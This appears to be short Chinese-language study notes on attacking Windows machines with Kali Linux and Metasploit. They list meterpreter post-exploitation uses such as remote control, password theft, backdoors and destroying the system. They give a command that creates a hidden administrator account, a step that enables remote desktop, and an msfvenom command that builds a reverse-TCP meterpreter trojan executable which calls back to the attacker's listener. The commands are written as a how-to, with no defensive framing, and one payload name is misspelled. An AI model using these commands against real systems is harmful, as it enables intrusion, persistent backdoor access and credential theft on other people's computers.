攻击机
kali操作系统 -免费,开源
在kali官网 https://www.kali.org/ 针对各种平台进行下载
虚拟机版本vmware
渗透工具metasploit 启动的命令:msfconsole 命令行
打开kali终端
使用sudo su 命令,输入密码后进入root模式
--->msf6->
攻击成功后,你想做什么
meterpreter 后渗透模块 使用help来查看帮助
主要功能:远程控制,命令执行 密码获取 创建后们应用 破坏操作系统
例:创建后门应用,开启远程连接
shell
net user zhangshan 123456/add && net localgroup administrators zhangshan /add
exit
run getgui -e
shell(进入其他机器的命令行)
getgui 开启远程连结 -e
window只允许一个窗口,所以会顶掉原用户。 【不推荐
使用kali渗透工具生成远控木马
windows可执行程序的后门为:
在shell中使用msfvenom 用来生成后们软件 在目标机执行后门,在本地监听上线
命令为
msfvenom -p windiws/x64/meterpreter/reverse_tcp lhost= 自己主机地址 lport=9999 -f exe -o demo.exe
生成一个木马
毒液